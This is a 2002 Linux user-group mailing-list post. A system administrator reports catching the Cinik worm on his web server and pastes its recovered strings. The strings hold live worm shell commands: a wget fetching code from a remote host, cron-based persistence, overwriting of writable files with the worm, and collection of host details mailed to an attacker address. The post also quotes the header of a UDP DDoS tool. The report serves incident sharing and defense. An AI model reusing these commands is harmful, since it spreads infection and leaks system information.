[ale] Under attack! (html encoding alert)

Matthew Brown matthew.brown at cordata.net
Tue Sep 24 08:16:16 EDT 2002 


Good 
luck.  They have never returned any of my phone calls.  If you get 
through to a human, I'd love to know!
 
 
Best regards,
Matthew Brown, President
CorData, Inc.
O: (770) 795-0089
F: (404) 806-4855
E: <A 
href="mailto:matthew.brown at cordata.net">matthew.brown at cordata.net

  
  <FONT 
  face=Tahoma size=2>-----Original Message-----From: James P. Kinney 
  III [mailto:jkinney at localnetsolutions.com] Sent: Tuesday, September 
  24, 2002 1:26 AMTo: Atlanta Linux User Group 
  (E-mail)Subject: [ale] Under attack! (html encoding 
  alert)Sorry for the html, having a bit of a problem right 
  now. I stumbled across a cracker getting into my box.  May have 
  come in through apache as the username on the installed app is apache.  
  (httpd error log looks like openssl attack. openssl was NOT upgraded 
  <doh!>) In ps, I saw : 21236 
  ?        S     96:33 
  /tmp/.cinik 63.238.109.140 Which is NOT something of mine. I was 
  investigating a possible intrusion on another machine and did a ping on an IP 
  address that someone had telneted in from on this clients machine. It was a 
  live address with no DNS records and it suddenly went dark. A few minutes 
  later, I noticed the connection lights on my DSL staying active for much 
  longer than getting email. Saw the above process running on the webserver. 
  Ran "strings" on the found worm file. Some interesting stuff from 
  that: /usr/bin/wget <A 
  href="http://zamfy.home.ro/0/cinik.c">http://zamfy.home.ro/0/cinik.c 
  mv /tmp/cinik.c /tmp/.cinik.c echo -e 'chmod a+x $i echo 1 
  `/bin/date +%H` \* \* \* $i %s \> /dev/null 2\>\&1 | 
  crontab'>> /tmp/.cinik.go echo '# ale altora'>> /tmp/.cinik.go 
  echo 'for i in `/usr/bin/find /usr /var /tmp /home /mnt -type f -perm 7 
  2>/dev/null`'>> /tmp/.cinik.go echo 'do'>> /tmp/.cinik.go 
  echo ' cat /tmp/.cinik > $i'>> /tmp/.cinik.go echo ' chmod 
  a+x $i'>> /tmp/.cinik.go echo ' echo 2 `/bin/date +%H` \* \* \* $i 
  %1 \> /dev/null 2\>\&1 | crontab'>> /tmp/.cinik.go echo 
  'done'>> /tmp/.cinik.go echo ' '>> /tmp/.cinik.go echo '# 
  directoarele mele'>> /tmp/.cinik.go echo 'for i in `/usr/bin/find 
  /usr /var /tmp /home /mnt -type d -uid $myid`'>> /tmp/.cinik.go echo 
  ' cat /tmp/.cinik > $i/.cinik'>> /tmp/.cinik.go echo ' chmod a+x 
  $i/.cinik'>> /tmp/.cinik.go echo ' echo 3 `/bin/date +%H` \* \* \* 
  $i/.cinik %1 \> /dev/null 2\>\&1 | crontab'>> /tmp/.cinik.go 
  echo 'echo PROC > /tmp/.cinik.status'>> /tmp/.cinik.go echo 
  'cat /proc/cpuinfo >> /tmp/.cinik.status'>> /tmp/.cinik.go 
  echo 'echo MEM >> /tmp/.cinik.status'>> /tmp/.cinik.go 
  echo 'cat /usr/bin/free >> /tmp/.cinik.status'>> 
  /tmp/.cinik.go echo 'echo HDD >> /tmp/.cinik.status'>> 
  /tmp/.cinik.go echo 'cat /bin/df -h >> /tmp/.cinik.status'>> 
  /tmp/.cinik.go echo 'echo IP >> /tmp/.cinik.status'>> 
  /tmp/.cinik.go echo 'cat /sbin/ifconfig >> 
  /tmp/.cinik.status'>> /tmp/.cinik.go echo 'myip=`/sbin/ifconfig eth0 
  | head -2 | tail -1 | cut -d: -f2 | cut -d" " -f1`'>> /tmp/.cinik.go 
  echo 'mail cinik_worm at yahoo.com -s "$myip" < /tmp/cinik.status'>> 
  /tmp/.cinik.go echo 'rm -f /tmp/cinik.status'>> /tmp/.cinik.go 
  chmod a+x /tmp/.cinik.go;/tmp/.cinik.go;exit This was from 
  running strings on the lastlog in /var/log: # strings lastlog 
  171.118.33.65.cfl.rr.com 1-020.adsl.cyberlink.ch But 
  the real clincher is I caught the bastard in the act and got the source code 
  intact! From the file /tmp/.cinic.c <FONT 
  size=2>/**************************************************************************** 
  <FONT 
  size=2>*                                                                          
  * <FONT 
  size=2>*           
  Peer-to-peer UDP Distributed Denial of Service 
  (PUD)           * 
  <FONT 
  size=2>*                         
  by 
  contem at efnet                                  
  * <FONT 
  size=2>*                                                                          
  * *         
  Virtually connects computers via the udp protocol on 
  the         * <FONT 
  size=2>*  specified port.  Uses a newly created peer-to-peer 
  protocol that        * <FONT 
  size=2>*  incorperates uses on unstable or dead computers.  The 
  program is        * <FONT 
  size=2>*  ran with the parameters of another ip on the virtual 
  network.  If       * <FONT 
  size=2>*  running on the first computer, run with the ip 127.0.0.1 or 
  some        * <FONT 
  size=2>*  other type of local address.  
  Ex:                                       
  * <FONT 
  size=2>*                                                                          
  * <FONT 
  size=2>*           Computer 
  A:   ./program 
  127.0.0.1                              
  * <FONT 
  size=2>*           Computer 
  B:   ./program 
  Computer_A                             
  * <FONT 
  size=2>*           Computer 
  C:   ./program 
  Computer_A                             
  * <FONT 
  size=2>*           Computer 
  D:   ./program 
  Computer_C                             
  * <FONT 
  size=2>*                                                                          
  * *         
  Any form of that will work.  The linking process works 
  by        * *  
  giving each computer the list of avaliable computers, 
  then              
  * *  using a technique called broadcast 
  segmentation combined with TCP       * 
  *  like functionality to insure that another computer on 
  the network       * <FONT 
  size=2>*  receives the broadcast packet, segments it again and 
  recreates          * 
  *  the packet to send to other hosts.  That 
  technique can be used to       * 
  *  support over 16 million simutaniously connected 
  computers.              
  * <FONT 
  size=2>*                                                                          
  * *         
  Thanks to ensane and st for donating shells and test 
  beds        * <FONT 
  size=2>*  for this program.  And for the admins who removed me 
  because I          * 
  *  was testing this program (you know who you are) need 
  to watch           * 
  *  their 
  backs.                                                            
  * <FONT 
  size=2>*                                                                          
  * *         I 
  am not responsible for any harm caused by this 
  program!        * <FONT 
  size=2>*  I made this program to demonstrate peer-to-peer communication 
  and       * *  
  should not be used in real life.  It is an education program 
  that       * *  
  should never even be ran at all, nor used in any way, shape 
  or          * <FONT 
  size=2>*  form.  It is not the authors fault if it was used for any 
  purposes      * *  other 
  than 
  educational.                                                 
  * <FONT 
  size=2>*                                                                          
  * <FONT 
  size=2>*                                                                          
  * *      A FEW MODIFICATIONS 
  MADE BY CiNIK FOR BETTER HIDING ON THE VICTIM   * <FONT 
  size=2>*                                                                          
  * <FONT 
  size=2>*                                                                          
  * <FONT 
  size=2>****************************************************************************/ 
  So now I'm getting pounded by udp packets in a DOS 
  from at least 18 IP's. This is going to the FBI. 
  
    
    
      -- 
James P. Kinney III   \Changing the mobile computing world/
President and CEO      \          one Linux user         /
Local Net Solutions,LLC \           at a time.          /
770-493-8244             \.___________________________./

GPG ID: 829C6CA7 James P. Kinney III (M.S. Physics) <jkinney at localnetsolutions.com>
Fingerprint = 3C9E 6366 54FC A3FE BA4D 0659 6190 ADC3 829C 6CA7

More information about the Ale mailing list